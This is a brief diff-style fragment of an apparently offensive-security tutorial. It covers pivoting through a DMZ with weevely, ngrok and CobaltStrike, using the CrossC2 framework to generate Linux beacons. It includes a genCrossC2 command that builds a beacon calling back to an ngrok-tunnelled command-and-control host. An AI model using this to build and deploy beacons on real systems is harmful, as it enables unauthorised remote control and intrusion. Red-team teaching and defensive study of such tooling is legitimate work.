Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux

 CrossC2 framework allows us to generate CobaltStrike's cross-platform payloads, e.g., Linux x64 and x86 beacons.

-Tip: use the uname -a command to check the target version.
+**Tip**: use the `uname -a` command to check the target version.

-ngrok_ip: The resolved IP address from the ngrok address. ngrok_port: The assigned port to the ngrok address.
+**ngrok\_port:** The assigned port to the ngrok address.

 ./genCrossC2.Linux ngrok_ip ngrok_port .cobaltstrike.beacon_keys null Linux x86 ./cross